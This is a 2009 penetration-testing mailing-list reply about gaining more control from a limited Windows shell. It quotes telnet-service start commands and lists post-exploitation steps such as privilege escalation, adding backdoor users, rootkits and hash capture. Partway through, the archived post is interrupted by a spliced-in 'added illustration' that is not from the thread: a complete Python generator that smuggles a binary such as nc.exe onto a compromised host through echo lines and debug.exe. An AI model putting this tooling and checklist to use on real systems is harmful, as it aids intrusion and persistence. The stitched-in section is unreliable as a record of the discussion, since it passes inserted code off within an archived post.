Penetration Testing mailing list archives
Re: clue on shell
From: ArcSighter Elite <arcsighter () gmail com>
Date: Wed, 07 Jan 2009 10:43:55 -0500
Joshua Gimer wrote:

> On Mon, Jan 5, 2009 at 11:59 AM, Ricardo Mourato <ricardomcm () gmail com> wrote:
>
>> I've got a shell, but it is very limited. I'm trying to upload some programs in order to get a better shell and get admin rights.
>
> You could also start the telnet service:
>
>     sc start TlntSvr
>
> or
>
>     net start TlntSvr
>
> Just be careful when performing your tests that you do not weaken the security posture of the system too much; the point is to determine high risk areas, not create them.

I think Windows Server 2003 improved the security of tftp and other dangerous services (at least in its access control).

I say it over and over again: a real pen-tester must know about post-exploitation techniques. I think this post is not getting anywhere; there are many ways. The interesting fact is that there are hundreds of papers discussing the issue, so I don't know why he doesn't have a clue about it. However, in the meantime, I know Windows is very poor in its default configuration for post-exploitation (compared to an "unsecured" Unix flavor, which at least has Perl in most cases), but as far as I know, if you got a shell you got root in most cases.

I normally let people google, but today I'll try something different. If you got a shell, then you have to provide us with the level of access you've acquired; if it's the default then you won't be SYSTEM, but you need to tell us.

Privilege escalation: well, many ways. For example, you could abuse ACLs of services or custom apps, or give a try to anything similar to uninformed's w32k.sys privilege escalation.

Post-exp (the list is far from complete, do the research):

1. executable uploading (debug, scr, vbs, hex dump, client-side scripting).
2. another web vuln (remote include, etc.)
3. privilege escalation (rev2self, win ACLs, vuln installed software, w32k-like privilege escalation exploit).
4. backdooring (adduser, trojan-horsing, rootkits)
5. host trust abusing.
6. enabled easy-filesharing abuse.
7. MITM attacks seeking privileged services' network traffic (hashes, etc.).
8. SMB-world attacks.

Give it a try. As I said, the list is far from complete, it is a mind-flash, but I think any of those 8 points will help you achieve your goal. Honestly.
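Worked example for item 1 above (the "debug" / "hex dump" upload through a limited shell). This is an added illustration, not code from the thread or from either poster. It builds the classic debug.exe script that recreates a binary from hex bytes, wraps every script line in a cmd.exe `echo` so the whole transfer is just typed (or pasted) into the restricted shell, and replays the script locally so you can confirm the round-trip before sending anything. The file names `nc.exe` and `up.scr` and the sample bytes are constructed for the example. Caveats baked into the code: debug.exe is a 16-bit tool, so it only exists on 32-bit Windows (it is absent on x64) and can only write a file that fits below 64 KiB; and the redirection is placed before `echo` so that a script line ending in a digit is never misparsed by cmd as a handle redirect such as `2>`.

```python
"""Generate cmd.exe 'echo' lines that rebuild a binary on a Windows host via
debug.exe, plus a local emulator to verify the script before use.
Added example; hypothetical file names, constructed sample data."""
import binascii

# debug.exe works inside one 64 KiB segment and loads data at CS:0100,
# so the largest file 'w' can write in one go is 0x10000 - 0x100 bytes.
MAX_DEBUG_BYTES = 0x10000 - 0x100


def debug_script(data: bytes, remote_name: str) -> list[str]:
    """Return the lines of a debug.exe script that writes `data` to `remote_name`.

    n <file>      name the output file
    e <addr> ..   enter bytes at addr (16 per line, starting at 0100)
    rcx / <hex>   set CX = number of bytes to write
    w / q         write CS:0100..CS:0100+CX, then quit
    """
    if len(data) > MAX_DEBUG_BYTES:
        raise ValueError("file exceeds what debug.exe can write; split it or use another transport")
    if not remote_name or any(c in remote_name for c in '<>&|^()" '):
        raise ValueError("use a plain filename without cmd.exe metacharacters")
    lines = [f"n {remote_name}"]
    for off in range(0, len(data), 16):
        chunk = data[off:off + 16]
        lines.append(f"e {0x100 + off:04x} " + " ".join(f"{b:02x}" for b in chunk))
    lines += ["rcx", f"{len(data):04x}", "w", "q"]
    return lines


def echo_commands(script_lines: list[str], remote_script: str = "up.scr") -> list[str]:
    """cmd.exe commands that write the script to disk and run it.

    The redirection goes in front of 'echo': '>up.scr echo 0005' is safe,
    whereas 'echo 5>up.scr' would be read by cmd as redirecting handle 5.
    First line truncates with '>', the rest append with '>>'.
    """
    cmds = []
    for i, line in enumerate(script_lines):
        op = ">" if i == 0 else ">>"
        cmds.append(f"{op}{remote_script} echo {line}")
    cmds.append(f"debug < {remote_script}")   # debug reads its commands from stdin
    cmds.append(f"del {remote_script}")
    return cmds


def replay_debug_script(lines: list[str]) -> tuple[str, bytes]:
    """Minimal local emulation of the n/e/rcx/w/q commands we emit.

    Returns (filename, bytes that debug.exe would write). Used to check the
    generated script reproduces the original file before it is pasted in.
    """
    mem = bytearray(0x10000)
    name, cx = None, None
    it = iter(lines)
    for line in it:
        parts = line.split()
        if parts[0] == "n":
            name = parts[1]
        elif parts[0] == "e":
            addr = int(parts[1], 16)
            for k, h in enumerate(parts[2:]):
                mem[addr + k] = int(h, 16)
        elif parts[0] == "rcx":
            cx = int(next(it), 16)
        elif parts[0] == "w":
            if name is None or cx is None:
                raise ValueError("'w' before 'n' or 'rcx'")
            return name, bytes(mem[0x100:0x100 + cx])
        elif parts[0] == "q":
            break
    raise ValueError("script never wrote a file")


# Constructed sample payload: an MZ-looking header followed by every byte value,
# so the round-trip exercises all hex digits. Not a real executable.
SAMPLE = b"MZ" + bytes(range(256)) * 2


def demo() -> bool:
    """Build the upload, replay it locally, and report whether it round-trips."""
    script = debug_script(SAMPLE, "nc.exe")
    name, rebuilt = replay_debug_script(script)
    ok = name == "nc.exe" and rebuilt == SAMPLE
    for cmd in echo_commands(script)[:3]:
        print(cmd)            # what you would type into the limited shell
    print("...", "round-trip OK" if ok else "MISMATCH")
    return ok


if __name__ == "__main__":
    demo()
```

For anything larger than the 64 KiB limit (or on an x64 host, where debug.exe does not exist), the same echo-and-decode pattern is used with a VBScript or a hex dump plus `certutil`-style decoder instead; the generator above is the part that is easy to get wrong (handle redirects, metacharacters in names, off-by-one in the CX size), which is why it verifies itself before anything leaves your machine.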
Current thread:
- clue on shell Ricardo Mourato (Jan 05)
- Re: clue on shell Robin Wood (Jan 06)
- Re: clue on shell ArcSighter Elite (Jan 06)
- Re: clue on shell Ricardo Mourato (Jan 06)
- Re: clue on shell Robin Wood (Jan 06)
- Re: clue on shell Christophe Kiciak (Jan 06)
- Re: clue on shell rajat swarup (Jan 06)
- Re: clue on shell Joshua Gimer (Jan 07)
- Re: clue on shell ArcSighter Elite (Jan 08)
- Re: clue on shell NeZa (Jan 08)
- Message not available
- Re: clue on shell Anthony Cicalla (Jan 09)
- Re: clue on shell Robin Wood (Jan 06)
- Re: clue on shell Anthony Cicalla (Jan 09)